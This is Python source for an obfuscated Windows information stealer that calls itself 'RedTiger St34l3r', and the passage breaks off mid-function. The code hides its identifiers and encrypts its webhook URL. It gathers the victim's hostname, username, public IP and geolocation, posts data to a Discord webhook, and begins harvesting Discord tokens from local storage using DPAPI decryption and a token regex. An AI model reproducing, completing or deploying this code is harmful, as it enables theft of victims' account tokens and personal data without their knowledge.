
import sys

def EDEBTXCQCDLBYEMAQDQHLEREOPCNWFCCXTRKFHLKHCHTSSMTMUMRGEVMIHWMPANIZOIHXRXKJDRAGPOBTYQONPCUALKKSNYL():
    def CJKXVDGCEODQURCGWWGOHGXKVAGXVNWYBIUPAWBFUCDCODASAHADBRIHVCKRIPQHSHQTSBZE():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        OUYIIHVESBJFWGFTWWGNIIRPLDORUMBSOJLBYOQJFVNIAJFXBDXPCTFUTBGKOPRLMGJPIFR = CJKXVDGCEODQURCGWWGOHGXKVAGXVNWYBIUPAWBFUCDCODASAHADBRIHVCKRIPQHSHQTSBZE()
        if OUYIIHVESBJFWGFTWWGNIIRPLDORUMBSOJLBYOQJFVNIAJFXBDXPCTFUTBGKOPRLMGJPIFR == True:
            return OUYIIHVESBJFWGFTWWGNIIRPLDORUMBSOJLBYOQJFVNIAJFXBDXPCTFUTBGKOPRLMGJPIFR
    except:
        return True
    
if EDEBTXCQCDLBYEMAQDQHLEREOPCNWFCCXTRKFHLKHCHTSSMTMUMRGEVMIHWMPANIZOIHXRXKJDRAGPOBTYQONPCUALKKSNYL() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def OUVCKJZQLKNWWWTJLJKBGONPTYUEWAGLZAFKLVQRDLVRRGAVCFDWISSGHGAQLZ(): pass
def GDXBMNAGAZXPOMFBFRQVDMCRLEHZMRYYEIVQBHFEQIUNWZRRER(): pass
def PKMGPZZGSFGUEGINJRSPRUTSLVTLUFIJFNHEXCQQYBYNIWUQJJFLJYICCBLHSNNIQQUXBLIHQIS(): pass
def DVWJOHUQEZFOOCWYIPZTHVQCHXBEIJRBFSYMDDWYFJJMYBLTLKPRVYRUIUOGTJVFZPJFPWOB(): pass
def HEBFXAPTJJFTZVOIOZGRLICOHMFDWFJBGTIMBEDHXZZPGOQQLTBUSJIAODMPXWFEZHBETMWRXZVDNTBXHHNYVZKCZQMBVNQPG(): pass
def CXOEAQCFBGEEBRMKFMDPUEIWQEVMQTDVPOQRBVRTSMHCGTAWHPJAIZFCYGLJUFUCVWSEJSHWJAZUNHBVHCNSKLCJXMRBEEQUEBNG(): pass
def JNNREVBPYUNCQPQCJRTTBSMPNWELLAREAODTZQAUCXPHWZUAFOKNPYHBEDIVPGXEGUSYZZHXV(): pass
def KVCWYTPDMQTOZEMOKNXMNKXOTHLEZZVEBJABMPEEARBBEPHIFRCMB(): pass
def YBUJSDKEBJJJMRAYNHXLBMJMDRNZNRPFAQMXIHIBCWGTOIRTJSTGTSWZCJCZWGMQEMYMLAZMEJUOJMKJHSZCVLUMMKCUFFS(): pass
def QREOWUDBMOELXKTDAWQLHIJERFAEWFPMOFFSQBZTNKBHVSMCOJVSRZGKNKPYVHVSPTDVSSVBPYWIDIDHUPLODXMBECNSK(): pass
def TSHVHDUBAQFZXDMUMZIQZKIZKYJHDLNWFAPPDNTHJMMGXRQURLPBVMIRULZB(): pass
def XHENCNJKBGOATCJLCKRYLEWXPQTWXATTWPMYRUWIJWUOQNXFLNJGJTFLOQYEJPWSXVEYWQCCESBYOG(): pass
def QGBLTSEOYTCZSEMCSMJXPWKWDIZZGDCCHGPPCSXQDEDQJYUAGNTAKAAXYNPRJLJCOXEOHRDIXWVSEXASCLLKYRPFLMZVPL(): pass
def RWDNOXQGYMHWIUCSSESRYTIUGLLZBVHIOYVBADKDXAXFGOGEBCLINBLSITBBLYWOPXHUAO(): pass
def XDURHPFKJWXEZYUYOGWRFDEGSYUPOYDEENANGRZUBTMZGZNGWTVBKKYEPNIUKGXKPJGSGWBBQBUAVTKG(): pass
def XYDVATSNFSFUKUSBNMDDIAFSLIHIIUDNYTZJEJAYPQUUHBQAZYSZUZHBQTCIJOYHBAXQOHDQFAIFIQDRQ(): pass
def XDLFGWRMXDOOHHMEFOVDJWSSWLBLNLTSHPDDRXRBHTOXQVEKHKYRKQDXQQJOTFRPXQFL(): pass
def EEJSXRKETJJLHTBPZIXYQRLQYMJMKLVTUPCNUKAVUUGGBDUZARCDDWAROWBHEQVH(): pass
def CYIFPBZHBCTHCDZRTGOUUQIQRLPENJZWSJERIJXKOYRCIGRDMSCQXAUVCSRBOLNRFLWQOZXFGJOVAV(): pass
def CNCDRDBJMNIZBRWKOKJODBSCUHLCBDPKLJTGILRBBADLHIZIWOAZQC(): pass

def MTLNOKXXYEPAFGCOPBZBWKSLJOBADOGJAMQWVKGRAOXQFSZYVRYJQRPQMHYGXQQLZPTLLTNSXKWYLDCUSF(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= CNGIQMZWQABBSLBBFQMWMWKSIBGLNDWRIILGXPCZINGIIDAWMEWLAATGXPUEIKSAEYBGWAWUMZEHBQWVVKYMFVWWPYILCKE
        )
        embed.set_footer(text=ZVVWAXALAQTAWHCNJNTVYHIKZCGQFAYFBMGNYULLXHCTJZOOGFICBXLMCXGSAIFVRRL, icon_url=AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH)
        client.send(embed=embed, username=OFOXPTBNYNBKKRWGGWEYDBCVTOMPKWMQERQMDQAZMWCLMQFETCWCRMXBFRSRLJRUHBTWRGDULOSUZGPPIYQAKUEF, avatar_url=AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH)
    except: pass

def NIWYXWHZYBQZYMXJIUGKQUIAFJLTJNKSOBMRRWORXTQFQPOXNGTACXEGBCQGZWSXJEZQECIECZYYC(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def YQKOOQXHDJRENSDIFNXVYCYJWENHHKJHFYAEZDLMLOSWGZGGBKKULINLQ():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def YAXLAAFJQPGNVUILDYUCMUXENFYPFWYDVRFUQVTKQWGSVPEMUJHBBGKSWTSRKGLCVHIBFNTBBSBEZKINXUSPJNOAAKMMGJLEHT(NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ, DVELQAHZBIZBDVFCHTFJWSLDSVAJNSOPIBBPJEERPZHBGPUDNBMGKVKKDMBVQUCVUZSQBZOTTCGOGEWBNVCUPJSHGRJAMDOOXL):
    def SOKSKKUAWJKUEDTZCUUYEZQBLLABDKMYGDLTOTSRPVBCDTHVLEWEDHCLUAXHTKVXVL(JSXJJWZTQTYUUXSNHTCOHOAWCIESKWUVFNBJSLNLVBIVTPQLRLMJFCXSUFNQGGPICOVKSN, JFLNMCTPSSCNUYBJQSVRHQJEPNHIGZFBNPCWBHMZUHTGZLEMEXWMVTNXHVLRAJQPAAUZURHSWNXJQEOMMDJUMQNQLBYTU):
        JQBOPPTRFVRBFUVQZRCISITXJNGTHQZSISKDVKPKXMZSPVOUPUPDMXAWEEHMSDGISJCCXXMNXCFDKVWKCNPYADKIZ = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=JFLNMCTPSSCNUYBJQSVRHQJEPNHIGZFBNPCWBHMZUHTGZLEMEXWMVTNXHVLRAJQPAAUZURHSWNXJQEOMMDJUMQNQLBYTU, iterations=100000, backend=default_backend())
        if isinstance(JSXJJWZTQTYUUXSNHTCOHOAWCIESKWUVFNBJSLNLVBIVTPQLRLMJFCXSUFNQGGPICOVKSN, str):  
            JSXJJWZTQTYUUXSNHTCOHOAWCIESKWUVFNBJSLNLVBIVTPQLRLMJFCXSUFNQGGPICOVKSN = JSXJJWZTQTYUUXSNHTCOHOAWCIESKWUVFNBJSLNLVBIVTPQLRLMJFCXSUFNQGGPICOVKSN.encode()  
        return JQBOPPTRFVRBFUVQZRCISITXJNGTHQZSISKDVKPKXMZSPVOUPUPDMXAWEEHMSDGISJCCXXMNXCFDKVWKCNPYADKIZ.derive(JSXJJWZTQTYUUXSNHTCOHOAWCIESKWUVFNBJSLNLVBIVTPQLRLMJFCXSUFNQGGPICOVKSN)

    NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data = base64.b64decode(NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ)
    JFLNMCTPSSCNUYBJQSVRHQJEPNHIGZFBNPCWBHMZUHTGZLEMEXWMVTNXHVLRAJQPAAUZURHSWNXJQEOMMDJUMQNQLBYTU = NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data[:16]
    IBWQDARPPPTNCICGXBYRFXIXXHIXTWWGGNJUPVZDRXHQMUJOCKZSPOEFNYQCWHRNOGCAXVWBCEXBSAEUCTTGWICWFKY = NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data[16:32]
    NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data = NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data[32:]
    MJSCRARKKRUMXZXKBTQIYLAHOWRLGGFBGWDLDIKPEVOAPENSOEACNOSYLFCYNAIGLVRAEKYVVXGYSDNVQHHUAXRZCKPVSBSECU = SOKSKKUAWJKUEDTZCUUYEZQBLLABDKMYGDLTOTSRPVBCDTHVLEWEDHCLUAXHTKVXVL(DVELQAHZBIZBDVFCHTFJWSLDSVAJNSOPIBBPJEERPZHBGPUDNBMGKVKKDMBVQUCVUZSQBZOTTCGOGEWBNVCUPJSHGRJAMDOOXL, JFLNMCTPSSCNUYBJQSVRHQJEPNHIGZFBNPCWBHMZUHTGZLEMEXWMVTNXHVLRAJQPAAUZURHSWNXJQEOMMDJUMQNQLBYTU)
    FVTLYZIDPICRHRSSPGGYCFKOKTKJPWBWPUGIPFTVFUOLOMYRGBNUZBKYPOXRLIANDI = Cipher(algorithms.AES(MJSCRARKKRUMXZXKBTQIYLAHOWRLGGFBGWDLDIKPEVOAPENSOEACNOSYLFCYNAIGLVRAEKYVVXGYSDNVQHHUAXRZCKPVSBSECU), modes.CBC(IBWQDARPPPTNCICGXBYRFXIXXHIXTWWGGNJUPVZDRXHQMUJOCKZSPOEFNYQCWHRNOGCAXVWBCEXBSAEUCTTGWICWFKY), backend=default_backend())
    YPWHHAXPYUIEYKNSSQYREALHUXBNWJMJOCYHWNHMXNISXLDSLYTCCXMVLAWROHBDRSCZPOMOOXUKXOYHKYCDIFUOPDKGF = FVTLYZIDPICRHRSSPGGYCFKOKTKJPWBWPUGIPFTVFUOLOMYRGBNUZBKYPOXRLIANDI.decryptor()
    WVILFUJZXFYSNCNXSTASTHPHUBFYWZGNXKFFXBSMMRHQALTEHBWWTVFTDT = YPWHHAXPYUIEYKNSSQYREALHUXBNWJMJOCYHWNHMXNISXLDSLYTCCXMVLAWROHBDRSCZPOMOOXUKXOYHKYCDIFUOPDKGF.update(NVQMJLSRABITTDFZPTQSNBWHPTTODRQAYVHWTSZAKVVJURJANRRAKHQBGEVRKPNMMVFSRISWSIEWVYIVICEOUEERDQNJHJ_data) + YPWHHAXPYUIEYKNSSQYREALHUXBNWJMJOCYHWNHMXNISXLDSLYTCCXMVLAWROHBDRSCZPOMOOXUKXOYHKYCDIFUOPDKGF.finalize()
    DOEDPBNNZCVWNFNMUDKMNVNVTHCIRCIAFMPXVYTAVXKBOYYYTHLSNENUHJHWTXWPGCLLCEKJTICHBHYIYNBZELEPFVTBEZD = padding.PKCS7(128).unpadder()
    XNQCOYBBKYIIDPWFUKKQYNAUSBHSZPEBBBCWXSRXTWYPZRKUWVOKMZKQAT = DOEDPBNNZCVWNFNMUDKMNVNVTHCIRCIAFMPXVYTAVXKBOYYYTHLSNENUHJHWTXWPGCLLCEKJTICHBHYIYNBZELEPFVTBEZD.update(WVILFUJZXFYSNCNXSTASTHPHUBFYWZGNXKFFXBSMMRHQALTEHBWWTVFTDT) + DOEDPBNNZCVWNFNMUDKMNVNVTHCIRCIAFMPXVYTAVXKBOYYYTHLSNENUHJHWTXWPGCLLCEKJTICHBHYIYNBZELEPFVTBEZD.finalize()
    return XNQCOYBBKYIIDPWFUKKQYNAUSBHSZPEBBBCWXSRXTWYPZRKUWVOKMZKQAT.decode()

NIWYXWHZYBQZYMXJIUGKQUIAFJLTJNKSOBMRRWORXTQFQPOXNGTACXEGBCQGZWSXJEZQECIECZYYC("")

try: YVTRRIPDLYFZJASFBQSUVUYAEOSZZNXNGGXYMXULICXFMYJVYNUWNBEVGPXGLU    = socket.gethostname()
except: YVTRRIPDLYFZJASFBQSUVUYAEOSZZNXNGGXYMXULICXFMYJVYNUWNBEVGPXGLU = "None"

try: JLFBXDZXPDAOSQBEMZMHSCTKUMBBGYFLWOTEVTJIJAJKPONJYJINAESRDIIKQQUQRLAFIRFODETXIKSJQDTCYETTJXGJAMNKSS    = os.getlogin()
except: JLFBXDZXPDAOSQBEMZMHSCTKUMBBGYFLWOTEVTJIJAJKPONJYJINAESRDIIKQQUQRLAFIRFODETXIKSJQDTCYETTJXGJAMNKSS = "None"

try: ICVEVKWLWZHDVHKCDIFRVWSSCLPWLFJURKHPNCHELWJIUUJSFULKCNJNZKLYNXBYOGX    = win32api.GetUserNameEx(win32api.NameDisplay)
except: ICVEVKWLWZHDVHKCDIFRVWSSCLPWLFJURKHPNCHELWJIUUJSFULKCNJNZKLYNXBYOGX = "None"

try: PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN = "None"

try: TNTTDJLLOYLXLYAIWBJHJUVHBWJBENFXJXDANAWRPAIXXHZXQWEMROSGWPVFIVEFWODYCFOTVMWHQ    = socket.gethostbyname(socket.gethostname())
except: TNTTDJLLOYLXLYAIWBJHJUVHBWJBENFXJXDANAWRPAIXXHZXQWEMROSGWPVFIVEFWODYCFOTVMWHQ = "None"

WNCRZTZMRVOITYXALXNFPUXXHGNADXVIZBZXUOFJTYGCGKWEARALAJXLUCEBDYGRECILUMMPIWLKCVNZRQT = r"""
ypxYTEPkmTNR6CJHvR3APxGydbq1NWBxUL2b55MRvjWgy4GT/i9E+hBfQr7UD25qlOeQ33LtzNoKltoUh62WWT91vU0wX6TC4GVnR5mBFYBwCf8YCcHZCRuuPz//DIv/z/J7uzZykHDPK+ltXgx/IODYUWLqIlE2xHiCweFFomXqxJIMr7d978V8G0IAAb5RMQWxI8lzx4qM1t70V1RKng==
"""

USNISYQOSYXHXLLUIWJJDJUEOKVCRURCQBNNMHRVOODMIFJBLNBZNPRBVRTN            = "ErLYJTnJKTNqfjIbeEXUMEPHMBZVcuYxVciuIHQZIbHcsdfGpEJuLSoqKcDgqyQjUhKSLmLWGJuHNmLrmvNosGHLpQtAPtlBDMSpudmQiNsrSUYsBYPOtBPZgksHKdWavNackzQAZijFItJSIZJtIGuqPJsfeJvXJRMPNyUMHLKfjBb"
CQIKPJIQZTABJZERLLRQBSXIGHHGPRIVMFXSEAMLZSTVPZXTZLHKIPEKQZZBTNWRZISUYEHHMVIUBRZLJETW        = "redtiger.shop"
CNGIQMZWQABBSLBBFQMWMWKSIBGLNDWRIILGXPCZINGIIDAWMEWLAATGXPUEIKSAEYBGWAWUMZEHBQWVVKYMFVWWPYILCKE    = 0xa80505
OFOXPTBNYNBKKRWGGWEYDBCVTOMPKWMQERQMDQAZMWCLMQFETCWCRMXBFRSRLJRUHBTWRGDULOSUZGPPIYQAKUEF = "RedTiger St34l3r"
AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
ZVVWAXALAQTAWHCNJNTVYHIKZCGQFAYFBMGNYULLXHCTJZOOGFICBXLMCXGSAIFVRRL    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
TAVQSHAWSICQKZQBEYRQJCSARUZWCGWJNPZWOAHXVVDFZDBRECZUIUGHWOCZXWCRXPUSTKQYVVMZYFLCAOOF   = {"text": ZVVWAXALAQTAWHCNJNTVYHIKZCGQFAYFBMGNYULLXHCTJZOOGFICBXLMCXGSAIFVRRL, "icon_url": AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH}
TYLFBQTVURAEDBAFSETVLKPIXLEXWBQDMNHCMZXNRJXYGUTFBLDVXGOWEGVVWNY    = f'`{JLFBXDZXPDAOSQBEMZMHSCTKUMBBGYFLWOTEVTJIJAJKPONJYJINAESRDIIKQQUQRLAFIRFODETXIKSJQDTCYETTJXGJAMNKSS} "{PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN}"`'
UOWXOTBXLCGVMGVSJTFTIWEPLKECGUQIZXXFXIQCNQKNPYKNVVEQPPISVRIKBSYVZ    = YAXLAAFJQPGNVUILDYUCMUXENFYPFWYDVRFUQVTKQWGSVPEMUJHBBGKSWTSRKGLCVHIBFNTBBSBEZKINXUSPJNOAAKMMGJLEHT(WNCRZTZMRVOITYXALXNFPUXXHGNADXVIZBZXUOFJTYGCGKWEARALAJXLUCEBDYGRECILUMMPIWLKCVNZRQT, USNISYQOSYXHXLLUIWJJDJUEOKVCRURCQBNNMHRVOODMIFJBLNBZNPRBVRTN)

RABNBCUDFHAQLFFJXQFYNRKIQDXCYJCDZUMOGDXDXIMLUCUVROJFATPOVROEIHEAY         = os.getenv("WINDIR", None).replace(" ", "%20")
VFJFUJRMFGLGRNXJRMVFUMAGGBCFOVNWRCYJTCNPVPRYIWTLSDYIFRVFDGECMYMOTPDLTYXDJFQNPFRMEAKCRWQMAPLKRYHMKYJI     = os.getenv('USERPROFILE', None).replace(" ", "%20")
GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    RKZFZBVMVHYFHALISDUECKBVZRRCPEJFSMLQIFYMVAWQPYLTQDZSGHNDTHPYZYXISHGXKVAZF = requests.get(f"https://{CQIKPJIQZTABJZERLLRQBSXIGHHGPRIVMFXSEAMLZSTVPZXTZLHKIPEKQZZBTNWRZISUYEHHMVIUBRZLJETW}/api/ip/ip={PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN}")
    CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE = RKZFZBVMVHYFHALISDUECKBVZRRCPEJFSMLQIFYMVAWQPYLTQDZSGHNDTHPYZYXISHGXKVAZF.json()

    OWAHUDKDLVXOJERGYJGZPELZLVHYLEFIIHQGXUZAOYKZBUANKKWAZNXZRMYGBXXNADATZYDMKNTJAQFKSOFYHDJMPGME = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('country', "None")
    OWAHUDKDLVXOJERGYJGZPELZLVHYLEFIIHQGXUZAOYKZBUANKKWAZNXZRMYGBXXNADATZYDMKNTJAQFKSOFYHDJMPGME_code = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('country_code', "None")
    YUNDGAKERRKHJOPLARMHAXGXIXMBMSJPMTHNTMJJGLKVPUXYROEGBQDXVROBVPZK = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('region', "None")
    YUNDGAKERRKHJOPLARMHAXGXIXMBMSJPMTHNTMJJGLKVPUXYROEGBQDXVROBVPZK_code = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('region_code', "None")
    WHSTHUHSEECATMNBMYEJPVRPRCBLPWYPDOLIFPWIVNINPPGQJZ = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('zip', "None")
    JMNRTSARJMPSMJELPWFQDGZLWWODAIBWGZSXYKYQDYQNACEQFUVMRJV = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('city', "None")
    PYQYFXGDMXBWHPBETHDGQVFMDOTZCYTEWIWMNBFYHQNJTQVHRLSLPBNRACWWLDPSWELQAGYBOFCUYKQKGUHQ = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('latitude', "None")
    NZLQOQPJCFZBYOQRDZUKXQCFCTKBQKBSFTCNWWGOLJXOWQIDLZIIAVHDOVDQBPDUNJLIRMAFABZQUZWIFVUHRAFP = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('longitude', "None")
    WVMZZRBXDYFLOWJEWHASWICSRSYMABWXPLUKWRWEYFIMPMQTJSHZUCUCSMKRUCKSYTV = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('timezone', "None")
    VLNVORYRHTKQMGYPOCBJUFDFEVQRNOPIRXDKQYKKSCZUQLUPMIZNNIDYSBHEGDKAPCI = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('isp', "None")
    HCCYBAUNROOOPCUNUUGEKEHMFBSWHZWNRUDGDRFCASKKPTRHPPBTRFUKXFKJLWVFHPISADPWPZGKJVMEMOVVRPJTVUW = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('org', "None")
    XHTJONMTBMZERTBANHTXOAICGTKDOUTYDIQBCWIMYBEYQKBNHXUJEAQCXRQJGPWZYGAMCGGAHYOTINSVITHMWESEFALESVOK = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('as', "None")
except:
    RKZFZBVMVHYFHALISDUECKBVZRRCPEJFSMLQIFYMVAWQPYLTQDZSGHNDTHPYZYXISHGXKVAZF = requests.get(f"http://ip-api.com/json/{PRTBOXKURAFYWZXZFZGARAHYGZPOWWAYVFMWNLZKVRVBKSESEDCMN}")
    CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE = RKZFZBVMVHYFHALISDUECKBVZRRCPEJFSMLQIFYMVAWQPYLTQDZSGHNDTHPYZYXISHGXKVAZF.json()

    OWAHUDKDLVXOJERGYJGZPELZLVHYLEFIIHQGXUZAOYKZBUANKKWAZNXZRMYGBXXNADATZYDMKNTJAQFKSOFYHDJMPGME = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('country', "None")
    OWAHUDKDLVXOJERGYJGZPELZLVHYLEFIIHQGXUZAOYKZBUANKKWAZNXZRMYGBXXNADATZYDMKNTJAQFKSOFYHDJMPGME_code = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('countryCode', "None")
    YUNDGAKERRKHJOPLARMHAXGXIXMBMSJPMTHNTMJJGLKVPUXYROEGBQDXVROBVPZK = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('regionName', "None")
    YUNDGAKERRKHJOPLARMHAXGXIXMBMSJPMTHNTMJJGLKVPUXYROEGBQDXVROBVPZK_code = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('region', "None")
    WHSTHUHSEECATMNBMYEJPVRPRCBLPWYPDOLIFPWIVNINPPGQJZ = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('zip', "None")
    JMNRTSARJMPSMJELPWFQDGZLWWODAIBWGZSXYKYQDYQNACEQFUVMRJV = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('city', "None")
    PYQYFXGDMXBWHPBETHDGQVFMDOTZCYTEWIWMNBFYHQNJTQVHRLSLPBNRACWWLDPSWELQAGYBOFCUYKQKGUHQ = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('lat', "None")
    NZLQOQPJCFZBYOQRDZUKXQCFCTKBQKBSFTCNWWGOLJXOWQIDLZIIAVHDOVDQBPDUNJLIRMAFABZQUZWIFVUHRAFP = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('lon', "None")
    WVMZZRBXDYFLOWJEWHASWICSRSYMABWXPLUKWRWEYFIMPMQTJSHZUCUCSMKRUCKSYTV = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('timezone', "None")
    VLNVORYRHTKQMGYPOCBJUFDFEVQRNOPIRXDKQYKKSCZUQLUPMIZNNIDYSBHEGDKAPCI = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('isp', "None")
    HCCYBAUNROOOPCUNUUGEKEHMFBSWHZWNRUDGDRFCASKKPTRHPPBTRFUKXFKJLWVFHPISADPWPZGKJVMEMOVVRPJTVUW = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('org', "None")
    XHTJONMTBMZERTBANHTXOAICGTKDOUTYDIQBCWIMYBEYQKBNHXUJEAQCXRQJGPWZYGAMCGGAHYOTINSVITHMWESEFALESVOK = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('as', "None")

def TSHVHDUBAQFZXDMUMZIQZKIZKYJHDLNWFAPPDNTHJMMGXRQURLPBVMIRULZB():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def OCFGKJYGNMDMPQFVVUBOVRBDYVRZZLJTGMCUVYTGZXTNSMCBJVGGCFVWVBRZNHMJHKDNDDY():
        TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN = "https://discord.com/api/v9/users/@me"
        FBIRSITFELIFKCCLZNZVHTSFKTXEOFEYMLUSMCWTGJXYIILHSKY = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        FBIRSITFELIFKCCLZNZVHTSFKTXEOFEYMLUSMCWTGJXYIILHSKY_enc = r"dQw4w9WgXcQ:[^\"]*"
        CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX = []
        EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP = []
        YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR = {}

        UBLISNWYYKAEGWCYTTTPPEIJJRSIJPYLBHQSOQFUKDJPVWMNLNTXG = {
            'Discord': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\discordptb\\Local Storage\\leveldb\\',
